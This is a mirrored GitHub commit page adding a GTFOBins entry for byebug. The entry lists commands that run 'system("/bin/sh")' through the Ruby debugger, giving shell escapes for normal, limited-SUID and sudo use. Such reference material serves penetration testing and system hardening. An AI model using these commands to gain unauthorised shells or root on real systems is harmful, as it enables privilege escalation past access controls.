mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 08:48:54 +01:00 
			
		
		
		
	Create byebug.md
This commit is contained in:
		
							
								
								
									
										21
									
								
								_gtfobins/byebug.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										21
									
								
								_gtfobins/byebug.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,21 @@ | ||||
| --- | ||||
| functions: | ||||
|   shell: | ||||
|     - code: | | ||||
|         TF=$(mktemp) | ||||
|         echo 'system("/bin/sh")' > $TF | ||||
|         byebug $TF | ||||
|         continue | ||||
|   limited-suid: | ||||
|     - code: | | ||||
|         TF=$(mktemp) | ||||
|         echo 'system("/bin/sh")' > $TF | ||||
|         ./byebug $TF | ||||
|         continue | ||||
|   sudo: | ||||
|     - code: | | ||||
|         TF=$(mktemp) | ||||
|         echo 'system("/bin/sh")' > $TF | ||||
|         sudo byebug $TF | ||||
|         continue | ||||
| --- | ||||
		Reference in New Issue
	
	Block a user